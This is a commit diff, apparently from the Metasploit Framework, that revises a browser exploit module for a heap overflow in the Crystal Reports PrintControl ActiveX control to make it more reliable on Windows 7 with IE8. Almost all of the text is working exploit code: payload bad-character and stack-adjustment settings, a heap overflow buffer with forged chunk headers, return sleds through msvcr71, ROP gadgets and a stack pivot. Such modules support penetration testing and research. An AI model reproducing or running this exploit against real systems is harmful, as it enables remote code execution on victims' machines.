trying to fix stability issues on w7

jvazquez-r7 · jvazquez-r7 · commit 3ed36bd66adc · 2012-12-17T19:17:36.000+01:00
diff --git a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
@@ -54,8 +54,9 @@ def initialize(info={})
 			'Payload'        =>
 				{
 					'Space' => 890,
+					'BadChars' => "\x00",
 					'DisableNops' => true,
-					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+					'PrependEncoder' => "\x81\xc4\xa4\xf3\xfe\xff" # Stack adjustment # add esp, -500
 				},
 			'DefaultOptions'  =>
 				{
@@ -221,9 +222,18 @@ def load_exploit_html(my_target, cli)
 		# 0x40c: Fill the current CrystalPrintControl object
 		# 0x8: Overflow next heap chunk header
 		# 0x52c: Overflow next CrystalPrintControl object until the ServerResourceVersion offset
-		bof = rand_text_alpha(1044)
+		bof = rand_text_alpha(1036)
+		bof << [0x01010101].pack("V") # next heap chunk header
+		bof << [0x01010101].pack("V") # next heap chunk header
 		bof << [my_target.ret].pack("V")
-		bof << rand_text_alpha(4) # trash
+		bof << [0x7c3410c4].pack("V") # ret # msvcr71
+		bof << [0x7c3410c4].pack("V") # ret # msvcr71
+		bof << [0x7c3410c4].pack("V") # ret # msvcr71
+		bof << [0x7c3410c4].pack("V") # ret # msvcr71
+		bof << [0x7c3410c4].pack("V") # ret # msvcr71
+		bof << [0x7c3410c4].pack("V") # ret # msvcr71
+		bof << [0x7c3410c4].pack("V") # ret # msvcr71
+		bof << [0x7c3410c4].pack("V") # ret # msvcr71 # eip for w7 sp0 / ie8
 		bof << rop_gadgets
 		bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, stackpivot_to_spray).encode_string
 		bof << rand_text_alpha(0x940 - bof.length)
